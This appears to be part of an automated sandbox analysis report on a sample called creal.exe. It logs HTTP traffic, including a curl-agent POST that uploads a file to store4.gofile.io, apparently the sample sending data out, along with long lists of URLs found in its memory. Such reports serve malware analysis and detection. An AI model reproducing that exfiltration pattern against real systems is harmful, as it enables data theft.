            Source: unknownHTTP traffic detected: POST /uploadFile HTTP/1.1Host: store4.gofile.ioUser-Agent: curl/7.83.1Accept: */*Content-Length: 193Content-Type: multipart/form-data; boundary=------------------------069d07de67658548
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Thu, 16 Jan 2025 08:09:17 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"X-Robots-Tag: noindex, nofollow
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Thu, 16 Jan 2025 08:09:35 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"X-Robots-Tag: noindex, nofollow
            Source: creal.exe, 00000002.00000002.1572428331.00000185BD0EC000.00000004.00001000.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1458123103.00000185BC815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
            Source: creal.exe, 00000002.00000002.1565300516.00000185BC270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/vcpython27
            Source: creal.exe, 00000002.00000003.1506165356.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1457557096.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514358388.00000185BBDA3000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535972591.00000185BC75B000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1518240184.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535265611.00000185BBDD4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1540883889.00000185BBEB4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1562299712.00000185BBDE8000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508070108.00000185BBE9C000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535358960.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1526002563.00000185BC756000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1543014171.00000185BBEBA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1533291208.00000185BBEB4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1515797188.00000185BBEB3000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1510991480.00000185BC7C5000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1519379988.00000185BC753000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514920740.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1569242001.00000185BC742000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1531272524.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1516736251.00000185BBDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
            Source: creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD911000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD911000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: creal.exe, 00000002.00000003.1507517761.00000185BBBF4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1519132495.00000185BB856000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1516398623.00000185BBB87000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1458778204.00000185BB83D000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1525161571.00000185BBBF8000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1543590405.00000185BB859000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1398441028.00000185BBBB7000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1400715482.00000185BB849000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1560090054.00000185BBBF8000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1524890898.00000185BBBE0000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1398046489.00000185BBBB7000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1517238738.00000185BBBB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
            Source: creal.exe, 00000002.00000003.1508070108.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1541236090.00000185BBF04000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1534642652.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1530994321.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1515797188.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD911000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372812589.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000000.00000003.1372993869.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544673920.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543067956.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1542758249.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535972591.00000185BC75B000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1540883889.00000185BBEB4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508070108.00000185BBE9C000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1526002563.00000185BC756000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1543014171.00000185BBEBA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1533291208.00000185BBEB4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1515797188.00000185BBEB3000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1519379988.00000185BC753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
            Source: creal.exe, 00000002.00000003.1506165356.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514358388.00000185BBDA3000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535265611.00000185BBDD4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1562299712.00000185BBDE8000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535358960.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1510991480.00000185BC7C5000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1516736251.00000185BBDD3000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1458427026.00000185BC7C5000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1549876890.00000185BBDE8000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1541650873.00000185BC7C7000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1517079062.00000185BC7C6000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1457557096.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514920740.00000185BBDBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1518240184.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514920740.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1569242001.00000185BC742000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1531272524.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1541410047.00000185BBE73000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514358388.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
            Source: creal.exe, 00000002.00000002.1563554021.00000185BBF4A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1457557096.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1552172208.00000185BBF4A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535972591.00000185BC780000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1519192009.00000185BC776000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1457557096.00000185BBF48000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1507461152.00000185BBF48000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1540883889.00000185BBEB4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1534642652.00000185BBED7000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1545098354.00000185BC78B000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1508070108.00000185BBE9C000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1526002563.00000185BC756000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1542135168.00000185BBED8000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1543014171.00000185BBEBA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1533291208.00000185BBEB4000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1545323606.00000185BBF4A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1550002310.00000185BBEDA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1515797188.00000185BBEB3000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1572961646.00000185BD26C000.00000004.00001000.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1519379988.00000185BC753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
            Source: creal.exe, 00000002.00000003.1526506609.00000185BC7B2000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1510991480.00000185BC7AA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1572428331.00000185BD000000.00000004.00001000.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1458858671.00000185BC79C000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1507238550.00000185BC79C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
            Source: creal.exe, 00000002.00000002.1568500285.00000185BC3E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
            Source: creal.exe, 00000002.00000002.1568500285.00000185BC3E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
            Source: creal.exe, 00000002.00000002.1568700343.00000185BC4E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
            Source: creal.exe, 00000002.00000002.1563972254.00000185BC060000.00000004.00001000.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1568895664.00000185BC5F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
            Source: creal.exe, 00000002.00000003.1527458874.00000185BBD50000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBD50000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1400199660.00000185BBD50000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1517379426.00000185BBD50000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1535040042.00000185BBD67000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1520179344.00000185BBD50000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1457557096.00000185BBD50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/unittest.html
